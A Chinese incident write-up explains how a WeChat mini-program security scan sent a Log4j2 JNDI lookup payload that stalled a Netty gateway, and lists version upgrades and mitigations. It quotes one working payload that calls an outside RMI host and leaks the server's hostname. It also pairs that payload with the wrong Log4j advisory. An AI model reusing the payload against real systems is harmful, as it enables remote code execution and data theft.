一、问题

近期生产在提交了微信小程序审核后(后面会讲到),总会出现一些生产告警,而且持续时间较长。我们查看一些工具和系统相关的,发现把我们的 gateway 差不多打死了。 有一些现象。

  1. 网关有很多接口处理慢。
  2. 网关健康检查不通过,发生重启。

前面我们提到是微信小程序审核后,为什么我们觉得是和这个相关,因为我们在相关的时间段的 Nginx 请求日志种的 agent 字段看到了 Tencent Security Team, more information: https://developers.weixin.qq.com/community/minihome/doc/0008ea401c89c02cff2d1345051001 。我们可以看到小程序提交审核后平台将对提审的小程序进行安全检测. 我们也找到对应的小程序负责人询问,是当天那个时间段前10分钟左右有提交小程序审核。 而且这个小程序也是包含了这些扫描接口的。

我们在想是业务场景触发的问题与这个扫描凑巧在一个时间段吗? 因为我们认为这个检查频率不至于打垮我们的服务。我们决定在一个业务闲时,也就是低峰期的时候检测一次(重新提交一次小程序提审)。 我们在提交完之后发现,扫描开始之后,我们的网关还是支撑不住了。频繁的超时和健康检查失败。 网关服务有节点发生了重启。 我们笃定跟微信的扫描是有关了。

二、解析过程

基本问题解析

我们在第二次扫描的时候,也做了一些准备。

  1. dump jvm 的内存。
  2. dump java 的线程栈。
  3. 关注 Nginxgateway 的日志。

我们 dump 线程栈发现了一些内容,但是我们没有引起注意。

内存 dump 的话,我们发下并没有占用太多内存,内存使用正常。

我们最后在 gateway 发现了一些日志。

整个请求耗时50多s。

我们看到 gateway 打出这个请求的请求体是

{
"pageNum": "${jndi:rmi://9.4.131.68:1099/bypass8cc3241fe66af8c6a1e82d9964e059be-/-${hostName}}",
"module": 1,
"pageSize": 20
}

这个 pageNum 的值看着就像注入的。然后我拿着这个值去搜索。

发现可能跟 log4j2 有关, 询问开发目前我们使用的是 2.13.1

log4j2漏洞公告中,我们发现 受影响的版本是 2.0-beta7 =< Apache Log4j 2.x < 2.17.0(2.3.2 和 2.12.4 版本不受影响)

该漏洞出现的时间是在 2021-12-29, 漏洞的详情

Apache Log4j2 是一个基于Java的开源日志记录框架,该框架重写了Log4j框架,是其前身Log4j 1.x 的重写升级版,并且引入了大量丰富的特性,使用非常的广泛。该框架被大量用于业务系统开发,用来记录日志信息。

据官方描述,拥有修改日志配置文件权限的攻击者,可以构造恶意的配置将 JDBC Appender 与引用 JNDI URI 的数据源一起使用,从而可通过该 JNDI URI 远程执行任意代码。

由于该漏洞要求攻击者拥有修改配置文件权限(通常需借助其他漏洞才可实现),非默认配置存在的问题,漏洞成功利用难度较大。

log4j2 漏洞相关源码解析

log4j2 在支持日志打印的时候,支持了十几种旁路策略,其中有一个就是jndilog4jjndi 实现远程调用并将结果进行日志打印,底层采用了socket 进行连接,但是没有设置超时时间,当日志中有多个${导致循环调用多次。所以上面日志打印会重复2次 jndi 的操作,又因为我们日志打印配置了consolerollingFile。所以会打印四次日志。

gateway采用 Netty 作为底层容器,采用了Reactor模式,有一个事件循环组负责监听事件,事件到达后会丢给另一个事件循环组去处理读写,事件循环组内有多个事件循环器,每个事件循环器由一个线程去处理业务读写,因此打印上面日志会阻塞住其中一个处理线程。从dump 出来的单个文件看是只有一个处理线程被阻塞了。而当进行心跳健康判断的时候,有一定几率会被分配给阻塞的线程,因此会放到队列中一直等待线程处理,进而超时了 把 gateway网关重启了;

四、问题解决办法

参考文档: https://logging.apache.org/log4j/2.x/security.html

建议解决办法

  1. 升级版本。

    Apache Log4j 2.x >= 2.3.2 (Java 6)
    Apache Log4j 2.x >= 2.12.4 (Java 7)
    Apache Log4j 2.x >= 2.17.1 (Java 8 及更新版)

临时解决版本

  1. 删除 JndiLookup.class

    在 2.16.0 以外的任何版本中,您可以JndiLookup从类路径中删除该类:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

  2. 配置环境变量 LOG4J_FORMAT_MSG_NO_LOOKUPStrue (处理场景有限)

    java opts 配置为 -Dlog4j2.formatMsgNoLookups=true (处理场景有限)

解决后测试

配置完成之后

前者处理为56秒,后者需要的时间为354ms. 是正常的响应时间。

一次 Java log4j2 漏洞导致的生产问题的更多相关文章

  1. Java反序列化漏洞通用利用分析

    原文:http://blog.chaitin.com/2015-11-11_java_unserialize_rce/ 博主也是JAVA的,也研究安全,所以认为这个漏洞非常严重.长亭科技分析的非常细致 ...

  2. Java反序列化漏洞分析

    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...

  3. java反序列化漏洞原理研习

    零.Java反序列化漏洞 java的安全问题首屈一指的就是反序列化漏洞,可以执行命令啊,甚至直接getshell,所以趁着这个假期好好研究一下java的反序列化漏洞.另外呢,组里多位大佬对反序列化漏洞 ...

  4. Lib之过?Java反序列化漏洞通用利用分析

    转http://blog.chaitin.com/ 1 背景 2 Java反序列化漏洞简介 3 利用Apache Commons Collections实现远程代码执行 4 漏洞利用实例 4.1 利用 ...

  5. 通过JBoss反序列化(CVE-2017-12149)浅谈Java反序列化漏洞

    前段时间学校学习J2EE,用到了jboss,顺便看了下jboss的反序列化,再浅谈下反序列化漏洞. Java序列化,简而言之就是把java对象转化为字节序列的过程.而反序列话则是再把字节序列恢复为ja ...

  6. 学习笔记 | java反序列化漏洞分析

    java反序列化漏洞是与java相关的漏洞中最常见的一种,也是网络安全工作者关注的重点.在cve中搜索关键字serialized共有174条记录,其中83条与java有关:搜索deserialized ...

  7. Java反序列化漏洞原理解析(案例未完善后续补充)

    序列化与反序列化 序列化用途:方便于对象在网络中的传输和存储 java的反序列化 序列化就是将对象转换为流,利于储存和传输的格式 反序列化与序列化相反,将流转换为对象 例如:json序列化.XML序列 ...

  8. Java反序列化漏洞总结

    本文首发自https://www.secpulse.com/archives/95012.html,转载请注明出处. 前言 什么是序列化和反序列化 Java 提供了一种对象序列化的机制,该机制中,一个 ...

  9. Java反序列化漏洞从入门到深入(转载)

    前言 学习本系列文章需要的Java基础: 了解Java基础语法及结构(菜鸟教程) 了解Java面向对象编程思想(快速理解请上知乎读故事,深入钻研建议买本<疯狂Java讲义>另外有一个刘意老 ...

随机推荐

  1. Minio分布式集群部署——Swarm

    最近研究minio分布式集群部署,发现网上大部分都是单服务器部署,而minio官方在github上现在也只提供了k8s和docker-compose的方式,网上有关与swarm启动minio集群的文章 ...

  2. [java]基础学习HELLOWORLD系列

    (一)手把手教你做JDK环境变量配置 步骤 1 : 首先看配置成功后的效果 点WIN键->运行(或者使用win+r) 输入cmd命令 输入java -version 注: -version是小写 ...

  3. java.lang.UnsatisfiedLinkError报错

    是因为使用maven时,运行web项目时,在maven的依赖包没有打包到tomcat中(out目录中),所以要手动加上

  4. 第六十二篇:Vue的双向绑定与按键修饰符

    好家伙,依旧是vue的基础 1.按键修饰符 假设我们在一个<input>框中输入了12345,我们希望按一下"Esc" 然后删除所有前面输入的内容,这时候,我们会用到按 ...

  5. ubuntu 安装及配置Apache

    一.下载.启动apache2 sudo apt-get install apache2 sudo /etc/init.d/apache2 restart 二.修改配置文件 1.更改网站根目录 sudo ...

  6. 一文搞懂mysql索引底层逻辑,干货满满!

    一.什么是索引 在mysql中,索引是一种特殊的数据库结构,由数据表中的一列或多列组合而成,可以用来快速查询数据表中有某一特定值的记录.通过索引,查询数据时不用读完记录的所有信息,而只是查询索引列即可 ...

  7. IO流的文件输入输出效率问题

    IO流的文件输入输出效率问题 第一种方法 我用使用一个数组,把FIleInputStream获取到的二进制数存入这个数组,然后使用FIleOutputStream进行输出 缺点:速度慢 优点:不消耗内 ...

  8. .NET 部署Https(SSL)通过代码方式

    在上一个文章中,传送门,给大家介绍了怎么在配置文件中使用 Kestrel 部署 Https,正好今天有小伙伴稳问到:可以通过代码的方式实现 Kestrel 的 Https 的部署吗?答案是肯定的,我们 ...

  9. 2.2 virtualenv 虚拟环境

    有的时候因为各种原因,在操作系统下,我们会安装很多版本的Python解释器.同样,我们也有可能因为各种原因,需要不同版本的模块,比如Django1.8,Django1.11.再加上pip工具管理器的版 ...

  10. 重要参考步骤---ProxySQL实现读写分离

    MySQL配置主从同步文章地址:https://www.cnblogs.com/sanduzxcvbnm/p/16295369.html ProxySQL实现读写分离与读负载均衡参考文档:https: ...